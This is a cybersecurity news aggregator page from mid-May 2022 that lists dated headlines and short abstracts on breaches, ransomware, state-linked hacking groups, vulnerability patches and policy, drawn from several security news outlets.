Update: Parker Hannifin reveals cyberattack exposed sensitive employee data Full Text
Abstract
Parker Hannifin said it began notifying potential victims, who include current and former employees, their dependents, and members of Parker’s Group Health Plans, on May 12.The Daily Swig
May 16, 2022 – Solution
Kali Linux 2022.2 released with 10 new tools, WSL improvements, and more Full Text
Abstract
Offensive Security has released Kali Linux 2022.2, the second version in 2022, with desktop enhancements, a fun April Fools screensaver, WSL GUI improvements, terminal tweaks, and best of all, new tools to play with!BleepingComputer
May 16, 2022 – Government
CISA Removes Windows Vulnerability From ‘Must-Patch’ List Due to Buggy Update Full Text
Abstract
CISA has temporarily removed a Windows flaw from its Known Exploited Vulnerabilities Catalog after it was informed by Microsoft that a recent update can cause problems on some types of systems.Security Week
May 16, 2022 – Breach
Engineering firm Parker discloses data breach after ransomware attack Full Text
Abstract
The Parker-Hannifin Corporation announced a data breach exposing employees' personal information after the Conti ransomware gang began publishing allegedly stolen data last month.BleepingComputer
May 16, 2022 – Vulnerabilities
SonicWall Patches Unauthorized Access Vulnerability in SMA Appliances Full Text
Abstract
SonicWall has released patches for multiple vulnerabilities in its Secure Mobile Access (SMA) series appliances, including a high-severity issue that could lead to unauthorized access.Security Week
May 15, 2022 – Policy and Law
Europe Agrees to Adopt New NIS2 Directive Aimed at Hardening Cybersecurity Full Text
Abstract
The European Parliament announced a "provisional agreement" aimed at improving cybersecurity and resilience of both public and private sector entities in the European Union. The revised directive, called " NIS2 " (short for network and information systems), is expected to replace the existing legislation on cybersecurity that was established in July 2016. The revamp sets ground rules, requiring companies in energy, transport, financial markets, health, and digital infrastructure sectors to adhere to risk management measures and reporting obligations. Among the provisions in the new legislation are flagging cybersecurity incidents to authorities within 24 hours, patching software vulnerabilities, and readying risk management measures to secure networks, failing which can incur monetary penalties. "The directive will formally establish the European Cyber Crises Liaison Organization Network, EU-CyCLONe, which will support the coordinated management of largThe Hacker News
May 15, 2022 – Criminals
Ukrainian Hacker Jailed for 4-Years in U.S. for Selling Access to Hacked Servers Full Text
Abstract
A 28-year-old Ukrainian national has been sentenced to four years in prison for siphoning thousands of server login credentials and selling them on the dark web for monetary gain as part of a credential theft scheme. Glib Oleksandr Ivanov-Tolpintsev , who pleaded guilty to his offenses earlier this February, was arrested in Poland in October 2020, before being extradited to the U.S. in September 2021. The illegal sale involved the trafficking of login credentials to servers located across the world and personally identifiable information such as dates of birth and Social Security numbers belonging to U.S. residents on a darknet marketplace. The unnamed site purportedly offered over 700,000 compromised servers for sale, including at least 150,000 in the U.S. alone. Believed to have been operational from around October 2014, the underground marketplace was seized by law enforcement authorities on January 24, 2019, according to court documents. This exactly coincides with the dismThe Hacker News
May 15, 2022 – Attack
Hackers are exploiting critical bug in Zyxel firewalls and VPNs Full Text
Abstract
Hackers have started to exploit a recently patched critical vulnerability, tracked as CVE-2022-30525, that affects Zyxel firewall and VPN devices for businesses.BleepingComputer
May 15, 2022 – Attack
Unique IceApple Attack Framework Targets Multiple Sectors Full Text
Abstract
CrowdStrike encountered a previously undocumented post-exploitation framework called IceApple deployed on Exchange servers for data exfiltration. Its long-running campaign focuses on intelligence gathering and indicates a state-sponsored mission, allegedly aligning with China-nexus, s ...Cyware Alerts - Hacker News
May 15, 2022 – General
May 08 – May 14 Ukraine – Russia the silent cyber conflict Full Text
Abstract
This post provides a timeline of the events related to Russia's invasion of Ukraine from the cyber security perspective. Below is the timeline of the events related to the ongoing Russian invasion that occurred in the previous weeks: May 14 - The LEGION...Security Affairs
May 15, 2022 – Phishing
Fake Pixelmon NFT site infects you with password-stealing malware Full Text
Abstract
A fake Pixelmon NFT site entices fans with free tokens and collectibles while infecting them with malware that steals their cryptocurrency wallets.BleepingComputer
May 15, 2022 – Malware
Eternity Project - A New Swiss Army Knife for Threat Actors Full Text
Abstract
Threat actors are using Tor and Telegram to spread the Eternity malware, which is customizable with modules including a stealer, clipper, worm, miner, and ransomware. It can pilfer information from cryptocurrency extensions or even cold wallets. It also targets password managers, VPN clients, messenge ...Cyware Alerts - Hacker News
May 15, 2022 – General
Security Affairs newsletter Round 365 by Pierluigi Paganini Full Text
Abstract
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs for free in your email box. If you want to also receive for free the newsletter with the international press subscribe here....Security Affairs
May 15, 2022 – APT
Ukraine CERT-UA warns of new attacks launched by Russia-linked Armageddon APT Full Text
Abstract
Ukraine Computer Emergency Response Team (CERT-UA) reported a phishing campaign conducted by Armageddon APT using GammaLoad.PS1_v2 malware. Ukraine Computer Emergency Response Team (CERT-UA) reported a phishing campaign using messages with subject...Security Affairs
May 15, 2022 – Botnet
Sysrv-K, a new variant of the Sysrv botnet includes new exploits Full Text
Abstract
Microsoft reported that the Sysrv botnet is targeting Windows and Linux servers by exploiting flaws in the Spring Framework and WordPress. The Microsoft Security Intelligence team reported that a new variant of the Sysrv botnet,...Security Affairs
May 14, 2022 – Education
Get Lifetime Access to 2022 Cybersecurity Certification Prep Courses @ 95% Off Full Text
Abstract
Ever thought about working full-time in cybersecurity ? With millions of unfilled jobs around, now is a great time to get into the industry. Of course, there are many different roles in this field. But all of them require the same handful of professional certifications. The 2022 Ultimate Advanced CyberSecurity Professional Certification Bundle helps you collect the full house, with five full-length courses working towards key exams . The included training has a total value of $1,475. But in a special deal for readers of The Hacker News, the bundle is now available for only $69. Special Offer — You can currently get five top-rated cybersecurity certification courses for only $69, with lifetime access included! Whether you want to be a penetration tester or a cybersecurity researcher, technical recruiters want to see proof of your security expertise. NIST is required for government projects. Meanwhile, CISSP, ISACA, and CASP+ can open doors in the private sector. In this buThe Hacker News
May 14, 2022 – Vulnerabilities
Microsoft fixes new PetitPotam Windows NTLM Relay attack vector Full Text
Abstract
A recent security update for a Windows NTLM relay attack has been confirmed to address a previously unfixed vector for the PetitPotam attack.BleepingComputer
May 14, 2022 – Insider Threat
Angry IT admin wipes employer’s databases, gets 7 years in prison Full Text
Abstract
Han Bing, a former database administrator for Lianjia, a Chinese real-estate brokerage giant, has been sentenced to 7 years in prison for logging into corporate systems and deleting the company's data.BleepingComputer
May 14, 2022 – Policy and Law
Crypto robber who lured victims via Snapchat and stole £34,000 jailed Full Text
Abstract
Online crypto scams and ponzi schemes leveraging social media platforms are hardly anything new. But, this gruesome case of a London-based crypto robber transcends the virtual realm and tells a shocking tale of real-life victims from whom the perpetrator successfully stole £34,000.BleepingComputer
May 14, 2022 – Denial Of Service
The LEGION collective calls to action to attack the final of the Eurovision song contest Full Text
Abstract
The Pro-Russian volunteer movement known as LEGION is calling for DDoS attacks against the final of the Eurovision song contest. LEGION is a Pro-Russian volunteer movement that focuses on DDoS attacks. The group made the headlines for attacks...Security Affairs
May 14, 2022 – Breach
OpRussia update: Anonymous breached other organizations Full Text
Abstract
Another week has passed and Anonymous has hacked other Russian companies and leaked their data via DDoSecrets. The #OpRussia launched by Anonymous against Russia after the criminal invasion of Ukraine continues; the collective claims to have hacked multiple...Security Affairs
May 14, 2022 – Attack
Pro-Russian hacktivists target Italy government websites Full Text
Abstract
Pro-Russian hacker group Killnet targeted the websites of several Italian institutions, including the senate and the National Institute of Health. A group of Pro-Russian hackers known as "Killnet" launched an attack against multiple websites of several...Security Affairs
May 14, 2022 – Vulnerabilities
Critical Vulnerabilities Provide Root Access to InHand Industrial Routers Full Text
Abstract
A total of 17 vulnerabilities have been found in a wireless industrial router made by InHand Networks, including flaws that can be chained to gain root access by getting a user to click on a malicious link.Security Week
May 14, 2022 – Vulnerabilities
Critical flaw in Zyxel firewalls grants access to corporate networks Full Text
Abstract
A critical vulnerability, CVE-2022-30525, affecting several models of Zyxel firewalls has been publicly revealed, along with a Metasploit module that exploits it. The patches for the vulnerability are available.Help Net Security
May 14, 2022 – Criminals
These ransomware attackers sent their ransom note to the victim’s printer Full Text
Abstract
Researchers have attributed a string of ransomware cyberattacks that took place in early 2022 to an Iranian hacking group they refer to as Cobalt Mirage – also known as APT35, Charming Kitten, Phosphorus, and TA453 by other research groups.ZDNet
May 13, 2022 – Ransomware
The Week in Ransomware - May 13th 2022 - A National Emergency Full Text
Abstract
While ransomware attacks have slowed during Russia's invasion of Ukraine and the subsequent sanctions, the malware threat continues to affect organizations worldwide.BleepingComputer
May 13, 2022 – Solution
Google Created ‘Open Source Maintenance Crew’ to Help Secure Critical Projects Full Text
Abstract
Google on Thursday announced the creation of a new "Open Source Maintenance Crew" to focus on bolstering the security of critical open source projects. Additionally, the tech giant pointed out Open Source Insights as a tool for analyzing packages and their dependency graphs, using it to determine "whether a vulnerability in a dependency might affect your code." "With this information, developers can understand how their software is put together and the consequences to changes in their dependencies," the company said. The development comes as security and trust in the open source software ecosystem has been increasingly thrown into question in the aftermath of a string of supply chain attacks designed to compromise developer workflows. In December 2021, a critical flaw in the ubiquitous open source Log4j logging library left several companies scrambling to patch their systems against potential abuse. The announcement also comes less thanThe Hacker News
May 13, 2022 – Education
How to Fight Foreign Hackers With Civil Litigation Full Text
Abstract
Major tech companies have begun to employ Microsoft’s strategy of suing cybercriminals who operate major botnets or engage in massive phishing schemes.Lawfare
May 13, 2022 – Vulnerabilities
SonicWall urges customers to fix SMA 1000 vulnerabilities Full Text
Abstract
SonicWall warns customers to address several high-risk security flaws impacting its Secure Mobile Access (SMA) 1000 Series line of products. SonicWall urges customers to address several high-risk security vulnerabilities affecting its Secure...Security Affairs
May 13, 2022 – Denial Of Service
Italian CERT: Hacktivists hit govt sites in ‘Slow HTTP’ DDoS attacks Full Text
Abstract
Italy's Computer Security Incident Response Team (CSIRT) has published an announcement about the recent DDoS attacks that key sites in the country suffered in the last couple of days.BleepingComputer
May 13, 2022 – Attack
New Saitama backdoor Targeted Official from Jordan’s Foreign Ministry Full Text
Abstract
A spear-phishing campaign targeting Jordan's foreign ministry has been observed dropping a new stealthy backdoor dubbed Saitama. Researchers from Malwarebytes and Fortinet FortiGuard Labs attributed the campaign to an Iranian cyber espionage threat actor tracked under the moniker APT34, citing resemblances to past campaigns staged by the group. "Like many of these attacks, the email contained a malicious attachment," Fortinet researcher Fred Gutierrez said . "However, the attached threat was not a garden-variety malware. Instead, it had the capabilities and techniques usually associated with advanced persistent threats (APTs)." APT34, also known as OilRig, Helix Kitten, and Cobalt Gypsy, is known to be active since at least 2014 and has a track record of striking telecom, government, defense, oil, and financial sectors in the Middle East and North Africa (MENA) via targeted phishing attacks. Earlier this February, ESET tied the group to a long-runniThe Hacker News
May 13, 2022 – Vulnerabilities
Zyxel fixed firewall unauthenticated remote command injection issue Full Text
Abstract
Zyxel addressed a critical flaw affecting Zyxel firewall devices that allows unauthenticated, remote attackers to gain arbitrary code execution. Zyxel has moved to address a critical security vulnerability (CVE-2022-30525, CVSS score: 9.8) affecting...Security Affairs
May 13, 2022 – Botnet
Microsoft: Sysrv botnet targets Windows, Linux servers with new exploits Full Text
Abstract
Microsoft says the Sysrv botnet is now exploiting vulnerabilities in the Spring Framework and WordPress to ensnare and deploy cryptomining malware on vulnerable Windows and Linux servers.BleepingComputer
May 13, 2022 – Attack
Iran-linked COBALT MIRAGE group uses ransomware in its operations Full Text
Abstract
The Iranian group used BitLocker and DiskCryptor in a series of attacks targeting organizations in Israel, the US, Europe, and Australia. Researchers at Secureworks Counter Threat Unit (CTU) are investigating a series of attacks conducted by the Iran-linked...Security Affairs
May 13, 2022 – Malware
Fake Binance NFT Mystery Box bots steal victim’s crypto wallets Full Text
Abstract
A new RedLine malware distribution campaign promotes fake Binance NFT mystery box bots on YouTube to lure people into infecting themselves with the information-stealing malware from GitHub repositories.BleepingComputer
May 13, 2022 – General
Most Organizations Hit by Ransomware Would Pay If Hit Again Full Text
Abstract
Almost nine in 10 organizations that have suffered a ransomware attack would choose to pay the ransom if hit again, according to a new report, compared with two-thirds of those that have not experienced an attack.The Register
May 13, 2022 – Vulnerabilities
SonicWall ‘strongly urges’ admins to patch SSLVPN SMA1000 bugs Full Text
Abstract
SonicWall "strongly urges" customers to patch several high-risk security flaws impacting its Secure Mobile Access (SMA) 1000 Series line of products that can let attackers bypass authorization and, potentially, compromise unpatched appliances.BleepingComputer
May 13, 2022 – Business
StackHawk Raises $20.7 Million in Series B Funding Full Text
Abstract
The round, which brings total funding raised to $35.3m, was led by Sapphire and Costanoa Ventures with the participation of others. The company intends to use the funds to invest in product development.FinSMEs
May 13, 2022 – General
Google Chrome updates failing on Android devices in Russia Full Text
Abstract
A growing number of Russian Chrome users on Android report getting errors when attempting to install the latest available update of the popular web browser.BleepingComputer
May 13, 2022 – Attack
Malware Campaign Targets At Least 14 German Automakers Full Text
Abstract
Researchers exposed a months-long campaign targeting German car dealerships and manufacturers to deploy a variety of info-stealing malware. Attacks were traced back to 14 targeted entities in the country. To remain protected, organizations are recommended to use a strong password, deploy anti-phish ...Cyware Alerts - Hacker News
May 13, 2022 – Criminals
New Clues Indicate REvil is All Set for a Comeback Full Text
Abstract
The once defunct REvil ransomware is indeed back on the scene as researchers throw light on new developments. The latest version of the malware tracked as 2.08 boasts some key modifications. Organizations must stay ahead of such threats and bolster their defense systems to thwart future ransomware ...Cyware Alerts - Hacker News
May 13, 2022 – Botnet
FluBot Spreads via SMS Campaigns to Target Finnish People Full Text
Abstract
The NCSC-FI issued a warning about increased FluBot activities. Now, it has gone beyond Android to target iPhone users via a new campaign that uses SMS and MMS. These SMS messages contain links to voicemail, missed call notifications, or alerts about incoming money from an unknown financial transac ...Cyware Alerts - Hacker News
May 12, 2022 – Vulnerabilities
Zyxel fixes firewall flaws that could lead to hacked networks Full Text
Abstract
Threat analysts who discovered a vulnerability affecting multiple Zyxel products report that the network equipment company fixed it via a silent update pushed out two weeks ago.BleepingComputer
May 12, 2022 – Attack
Iranian hackers exposed in a highly targeted espionage campaign Full Text
Abstract
Threat analysts have spotted a novel attack attributed to the Iranian hacking group known as APT34 or OilRig, which targeted a Jordanian diplomat with custom-crafted tools.BleepingComputer
May 12, 2022 – Vulnerabilities
HP Patches UEFI Vulnerabilities Affecting Over 200 Computers Full Text
Abstract
HP on Wednesday announced the release of patches for two high-severity vulnerabilities that impact the UEFI firmware of more than 200 laptops, workstations, and other products.Security Week
May 12, 2022 – Attack
Iranian Hackers Leveraging BitLocker and DiskCryptor in Ransomware Attacks Full Text
Abstract
A ransomware group with an Iranian operational connection has been linked to a string of file-encrypting malware attacks targeting organizations in Israel, the U.S., Europe, and Australia. Cybersecurity firm Secureworks attributed the intrusions to a threat actor it tracks under the moniker Cobalt Mirage, which it said is linked to an Iranian hacking crew dubbed Cobalt Illusion (aka APT35, Charming Kitten, Newscaster, or Phosphorus). "Elements of Cobalt Mirage activity have been reported as Phosphorus and TunnelVision ," Secureworks Counter Threat Unit (CTU) said in a report shared with The Hacker News. The threat actor is said to have conducted two different sets of intrusions, one of which relates to opportunistic ransomware attacks involving the use of legitimate tools like BitLocker and DiskCryptor for financial gain. The second set of attacks are more targeted, carried out with the primary goal of securing access and gathering intelligence, while also deplThe Hacker News
May 12, 2022 – Covid-19
New Nerbian RAT spreads via malspam campaigns using COVID-19 Full Text
Abstract
Researchers spotted a new remote access trojan, named Nerbian RAT, which implements sophisticated evasion and anti-analysis techniques. Researchers from Proofpoint discovered a new remote access trojan called Nerbian RAT that implements sophisticated...Security Affairs
May 12, 2022 – Malware
Malware Builder Leverages Discord Webhooks Full Text
Abstract
Researchers discovered a simple malware builder designed to steal credentials and then send them to Discord webhooks.Threatpost
May 12, 2022 – Policy and Law
Ukrainian imprisoned for selling access to thousands of PCs Full Text
Abstract
Glib Oleksandr Ivanov-Tolpintsev, a 28-year-old from Ukraine, was sentenced today to 4 years in prison for stealing thousands of login credentials per week and selling them on a dark web marketplace.BleepingComputer
May 12, 2022 – Government
The Stakes ‘Could Not be Any Higher’: CISA Chief Talks About the Tech Challenges Ahead Full Text
Abstract
Security by design needs to be ingrained in software development, and innovative thinking is required to help secure society against cyber attacks as technology becomes a bigger part of our everyday lives.ZDNet
May 12, 2022 – Policy and Law
E.U. Proposes New Rules for Tech Companies to Combat Online Child Sexual Abuse Full Text
Abstract
The European Commission on Wednesday proposed new regulation that would require tech companies to scan for child sexual abuse material (CSAM) and grooming behavior, raising worries that it could undermine end-to-end encryption (E2EE). To that end, online service providers, including hosting services and communication apps, are expected to proactively scan their platforms for CSAM as well as report, remove and disable access to such illicit content. While instant messaging services like WhatsApp already rely on hashed versions of known CSAM to automatically block new uploads of images or videos matching them, the new plan requires such platforms to identify and flag new instances of CSAM. "Detection technologies must only be used for the purpose of detecting child sexual abuse," the regulator said . "Providers will have to deploy technologies that are the least privacy-intrusive in accordance with the state of the art in the industry, and that limit the error ratThe Hacker News
May 12, 2022 – Breach
Massive hacking campaign compromised thousands of WordPress websites Full Text
Abstract
Researchers uncovered a massive hacking campaign that compromised thousands of WordPress websites to redirect visitors to scam sites. Cybersecurity researchers from Sucuri uncovered a massive campaign that compromised thousands of WordPress websites...Security Affairs
May 12, 2022 – Malware
Eternity malware kit offers stealer, miner, worm, ransomware tools Full Text
Abstract
Threat actors have launched the 'Eternity Project,' a new malware-as-a-service where threat actors can purchase a malware toolkit that can be customized with different modules depending on the attack being conducted.BleepingComputer
May 12, 2022 – Vulnerabilities
Chrome 101 Update Patches High-Severity Vulnerabilities Full Text
Abstract
Based on severity ratings and the currently listed bug bounties, the most important of these flaws is CVE-2022-1633, a high-severity use-after-free in Sharesheet that was reported by Khalil Zhani, who was awarded a $5,000 reward for the find.Security Week
May 12, 2022 – Breach
Thousands of WordPress Sites Hacked to Redirect Visitors to Scam Sites Full Text
Abstract
Cybersecurity researchers have disclosed a massive campaign that's responsible for injecting malicious JavaScript code into compromised WordPress websites that redirects visitors to scam pages and other malicious websites to generate illegitimate traffic. "The websites all shared a common issue — malicious JavaScript had been injected within their website's files and the database, including legitimate core WordPress files," Krasimir Konov, a malware analyst at Sucuri, said in a report published Wednesday. This involved infecting files such as jquery.min.js and jquery-migrate.min.js with obfuscated JavaScript that's activated on every page load, allowing the attacker to redirect the website visitors to a destination of their choice. The GoDaddy-owned website security company said that the domains at the end of the redirect chain could be used to load advertisements, phishing pages, malware, or even trigger another set of redirects. In some instances, unsusThe Hacker News
May 12, 2022 – Vulnerabilities
Red TIM Research (RTR) finds 2 bugs affecting F5 Traffix SDC Full Text
Abstract
Experts at TIM research laboratory, Red Team Research (RTR), have disclosed a couple of bugs affecting F5 Traffix SDC. Among these 45 bugs fixed by the well-known manufacturer of computer security systems, 2 were detected by TIM research laboratory,...Security Affairs
May 12, 2022 – Vulnerabilities
Zyxel silently fixes critical RCE vulnerability in firewall products Full Text
Abstract
Threat analysts who discovered a vulnerability affecting multiple Zyxel products report that the network equipment company fixed it via a silent update pushed out two weeks ago.BleepingComputer
May 12, 2022 – Vulnerabilities
Intel Patches High-Severity Vulnerabilities in BIOS, Boot Guard Full Text
Abstract
Intel also announced the release of patches for a high-severity bug in Boot Guard and Trusted Execution Technology (TXT). Tracked as CVE-2022-0004 (CVSS score of 7.3), the bug could be exploited to elevate privileges on a vulnerable system.Security Week
May 12, 2022 – Solution
Android and Chrome Users Can Soon Generate Virtual Credit Cards to Protect Real Ones Full Text
Abstract
Google on Wednesday took to its annual developer conference to announce a host of privacy and security updates, including support for virtual credit cards on Android and Chrome. "When you use autofill to enter your payment details at checkout, virtual cards will add an additional layer of security by replacing your actual card number with a distinct, virtual number," Google's Jen Fitzpatrick said in a statement. The goal, the search giant said, is to keep payment information safe and secure during online shopping and protect users from skimming attacks wherein threat actors inject malicious JavaScript code to plunder credit card numbers and sell them on the black market. The feature is expected to roll out in the U.S. for Visa, American Express, Mastercard, and Capital One cards starting this summer. Interestingly, while Apple offers an option to mask email addresses via Hide My Email , which enables users to create unique, random email addresses to use with appsThe Hacker News
May 12, 2022 – Government
Five Eyes agencies warn of attacks on MSPs Full Text
Abstract
Cybersecurity authorities from the Five Eyes warn of threats targeting managed service providers (MSPs) and potential supply chain attacks through them. Multiple cybersecurity authorities from Australia, Canada, New Zealand, the U.K., and the U.S. this...Security Affairs
May 12, 2022 – Malware
BPFdoor: Stealthy Linux malware bypasses firewalls for remote access Full Text
Abstract
A recently discovered backdoor malware called BPFdoor has been stealthily targeting Linux and Solaris systems without being noticed for more than five years.BleepingComputer
May 12, 2022 – Vulnerabilities
Hundreds of Thousands of Konica Printers Vulnerable to Hacking via Physical Access Full Text
Abstract
Researchers at Atos-owned cybersecurity consulting firm SEC Consult analyzed Konica Minolta printers to determine what could be achieved by an attacker who has physical access to a device. The answer: a lot!Security Week
May 12, 2022 – Education
Everything We Learned From the LAPSUS$ Attacks Full Text
Abstract
In recent months, a cybercriminal gang known as LAPSUS$ has claimed responsibility for a number of high-profile attacks against technology companies, including T-Mobile (April 23, 2022), Globant, Okta, Ubisoft, Samsung, Nvidia, Microsoft, and Vodafone. In addition to these attacks, LAPSUS$ was also able to successfully launch a ransomware attack against the Brazilian Ministry of Health. While high-profile cyber-attacks are certainly nothing new, there are several things that make LAPSUS$ unique. The alleged mastermind of these attacks and several other alleged accomplices were all teenagers. Unlike more traditional ransomware gangs, LAPSUS$ has a very strong social media presence. The gang is best known for data exfiltration. It has stolen source code and other proprietary information and has often leaked this information on the Internet. LAPSUS$ stolen credentials: In the case of Nvidia, for example, the attackers gained access to hundreds of gigabytes of proprietary data,The Hacker News
May 12, 2022 – Education
Historic Hotel Stay, Complementary Emotet Exposure included Full Text
Abstract
A Historic Hotel of America is serving up modern malware to its guests. Why securing your inbox with more than just anti-malware engines is needed to prevent cybercrime attacks.BleepingComputer
May 11, 2022 – Vulnerabilities
Actively Exploited Zero-Day Bug Patched by Microsoft Full Text
Abstract
Microsoft’s May Patch Tuesday roundup also included critical fixes for a number of flaws found in infrastructure present in many enterprise and cloud environments.Threatpost
May 11, 2022 – Outage
Ransomware Deals Deathblow to 157-year-old College Full Text
Abstract
Why a private college that stayed in business for 157 years had to close after the combo of COVID-19 and ransomware proved too much.Threatpost
May 11, 2022 – Government
Government Agencies Warn of Increase in Cyberattacks Targeting MSPs Full Text
Abstract
Multiple cybersecurity authorities from Australia, Canada, New Zealand, the U.K., and the U.S. on Wednesday released a joint advisory warning of threats targeting managed service providers (MSPs) and their customers. Key among the recommendations are identifying and disabling accounts that are no longer in use, enforcing multi-factor authentication (MFA) on MSP accounts that access customer environments, and ensuring transparency in ownership of security roles and responsibilities. MSPs have emerged as an attractive attack route for cybercriminals to scale their attacks, as a vulnerable provider can be weaponized as an initial access vector to breach several downstream customers at once. The spillover effects of such intrusions, as witnessed in the wake of high-profile breaches aimed at SolarWinds and Kaseya in recent years, have once again underlined the need to secure the software supply chain. The targeting of MSPs by malicious cyber actors in an effort to "explThe Hacker News
May 11, 2022 – Malware
Hackers Deploy IceApple Exploitation Framework on Hacked MS Exchange Servers Full Text
Abstract
Researchers have detailed a previously undocumented .NET-based post-exploitation framework called IceApple that has been deployed on Microsoft Exchange server instances to facilitate reconnaissance and data exfiltration. "Suspected to be the work of a state-nexus adversary, IceApple remains under active development, with 18 modules observed in use across a number of enterprise environments, as of May 2022," CrowdStrike said in a Wednesday report. The cybersecurity firm, which discovered the sophisticated malware in late 2021, noted its presence in multiple victim networks and in geographically distinct locations. Targeted victims span a wide range of sectors, including technology, academic, and government entities. A post-exploitation toolset, as the name implies, is not used to provide initial access, but is rather employed to carry out follow-on attacks after having already compromised the hosts in question. IceApple is notable for the fact that it's an in-memoThe Hacker News
May 11, 2022 – Policy and Law
US charges hacker for breaching brokerage accounts, securities fraud Full Text
Abstract
The U.S. Department of Justice (DoJ) has charged Idris Dayo Mustapha for a range of cybercrime activities that took place between 2011 and 2018, resulting in financial losses estimated at over $5,000,000.BleepingComputer
May 11, 2022 – Business
Concentric AI Raises $14.5M in Series A Funding Full Text
Abstract
Concentric Inc. raised $14.5 million in Series A funding led by Ballistic Ventures with participation from Citi Ventures and current investors Core Ventures Group, Engineering Capital, and Clear Ventures.FinSMEs
May 11, 2022 – APT
Bitter APT Hackers Add Bangladesh to Their List of Targets in South Asia Full Text
Abstract
An espionage-focused threat actor known for targeting China, Pakistan, and Saudi Arabia has expanded to set its sights on Bangladeshi government organizations as part of an ongoing campaign that commenced in August 2021. Cybersecurity firm Cisco Talos attributed the activity with moderate confidence to a hacking group dubbed the Bitter APT based on overlaps in the command-and-control (C2) infrastructure with that of prior campaigns mounted by the same actor. "Bangladesh fits the profile we have defined for this threat actor, previously targeting Southeast Asian countries including China , Pakistan, and Saudi Arabia," Vitor Ventura, lead security researcher at Cisco Talos for EMEA and Asia, told The Hacker News. "And now, in this latest campaign, they have widened their reach to Bangladesh. Any new country in southeast Asia being targeted by Bitter APT shouldn't be of surprise." Bitter (aka APT-C-08 or T-APT-17) is suspected to be a South Asian hackingThe Hacker News
May 11, 2022 – Government
CISA adds CVE-2022-1388 flaw in F5 BIG-IP to its Known Exploited Vulnerabilities Catalog Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds the critical CVE-2022-1388 flaw in F5 BIG-IP products to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added critical CVE-2022-1388...Security Affairs
May 11, 2022 – Vulnerabilities
Intel Memory Bug Poses Risk for Hundreds of Products Full Text
Abstract
Dell and HP were among the first to release patches and fixes for the bug.Threatpost
May 11, 2022 – Vulnerabilities
HP fixes bug letting attackers overwrite firmware in over 200 models Full Text
Abstract
HP has released BIOS updates today to fix two high-severity vulnerabilities affecting a wide range of PC and notebook products, which might allow arbitrary code execution.BleepingComputer
May 11, 2022 – Phishing
Vanity URLs Could be Spoofed for Social Engineering Attacks Full Text
Abstract
Vanity links created by companies to add their brand to well-known cloud services could become a useful vector for phishing attacks and a way to better fool victims, researchers warn.Dark Reading
May 11, 2022 – Malware
Researchers Warn of Nerbian RAT Targeting Entities in Italy, Spain, and the U.K. Full Text
Abstract
A previously undocumented remote access trojan (RAT) written in the Go programming language has been spotted disproportionately targeting entities in Italy, Spain, and the U.K. Called Nerbian RAT by enterprise security firm Proofpoint, the novel malware leverages COVID-19-themed lures to propagate as part of a low volume email-borne phishing campaign that started on April 26, 2022. "The newly identified Nerbian RAT leverages multiple anti-analysis components spread across several stages, including multiple open-source libraries," Proofpoint researchers said in a report shared with The Hacker News. "It is written in operating system (OS) agnostic Go programming language, compiled for 64-bit systems, and leverages several encryption routines to further evade network analysis." The messages, amounting to less than 100 in number, purport to be from the World Health Organization about safety measures related to COVID-19, urging potential victims to open a macrThe Hacker News
May 11, 2022 – Phishing
Novel Phishing Trick Uses Weird Links to Bypass Spam Filters Full Text
Abstract
A novel form of phishing takes advantage of a disparity between how browsers and email inboxes read web domains.Threatpost
May 11, 2022 – Malware
New stealthy Nerbian RAT malware spotted in ongoing attacks Full Text
Abstract
A new remote access trojan called Nerbian RAT has been discovered that includes a rich set of features, including the ability to evade detection and analysis by researchers.BleepingComputer
May 11, 2022 – Hacker
Hackers are using tech services companies as a ‘launchpad’ for attacks on customers Full Text
Abstract
A warning from international cybersecurity agencies has urged IT service providers and their customers to take action to protect themselves from the threat of supply chain attacks.ZDNet
May 11, 2022 – Education
[White Paper] Social Engineering: What You Need to Know to Stay Resilient Full Text
Abstract
Security and IT teams are losing sleep as would-be intruders lay siege to the weakest link in any organization's digital defense: employees. By preying on human emotion, social engineering scams inflict billions of dollars of damage with minimal planning or expertise. Cybercriminals find it easier to manipulate people before resorting to technical "hacking" tactics. Recent research reveals that social engineering is leveraged in 98% of attacks. As the rapid, ongoing acceleration of remote work raises the stakes, security leaders are fighting back with education and awareness. Resources developed by experts, like this new white paper — " Social Engineering: What You Need to Know to Stay Resilient " — identify the most common tactics, track how these types of attacks are evolving, and provide tips to protect organizations and their end-users. These insights not only inform security practitioners of the latest tactics and emerging threats, but help employees undeThe Hacker News
May 11, 2022 – Government
CISA tells federal agencies to fix actively exploited F5 BIG-IP bug Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a new security vulnerability to its list of actively exploited bugs, the critical severity CVE-2022-1388 affecting BIG-IP network devices.BleepingComputer
May 11, 2022 – Solution
Yahoo! JAPAN Enables Fingerprint and Face Login to Its Service Apps and Smartphone Browsers Full Text
Abstract
Yahoo Japan Corporation has completed the implementation of biometric authentication to the Android version of Yahoo! JAPAN service apps. With this, biometric authentication can now be used to log in to Yahoo! JAPAN’s various service apps.Yahoo Finance
May 11, 2022 – Malware
Malicious NPM Packages Target German Companies in Supply Chain Attack Full Text
Abstract
Cybersecurity researchers have discovered a number of malicious packages in the NPM registry specifically targeting a number of prominent media, logistics, and industrial firms based in Germany to carry out supply chain attacks . "Compared with most malware found in the NPM repository, this payload seems particularly dangerous: a highly-sophisticated, obfuscated piece of malware that acts as a backdoor and allows the attacker to take total control over the infected machine," researchers from JFrog said in a new report. The DevOps company said that evidence points to it being either the work of a sophisticated threat actor or a "very aggressive" penetration test. All the rogue packages, most of which have since been removed from the repository, have been traced to four "maintainers" - bertelsmannnpm, boschnodemodules, stihlnodemodules, and dbschenkernpm — indicating an attempt to impersonate legitimate firms like Bertelsmann, Bosch, Stihl, and DB ScThe Hacker News
May 11, 2022 – General
Our Medical Devices’ Open Source Problem – What Are the Risks? Full Text
Abstract
There is no doubt that open source powers our development processes, enabling software developers to build high quality, innovative products faster than ever before. But OSS also comes with its own set of risks that device manufacturers must address while leveraging its many advantages.BleepingComputer
May 11, 2022 – APT
Bitter APT Adds Bangladesh to its Targets Full Text
Abstract
Bitter APT, known for targeting China, Pakistan, and Saudi Arabia, reportedly added Bangladesh to its list of targets as researchers find malicious emails sent to officers of the Bangladesh police.Cisco Talos
May 11, 2022 – Government
FBI, CISA, and NSA warn of hackers increasingly targeting MSPs Full Text
Abstract
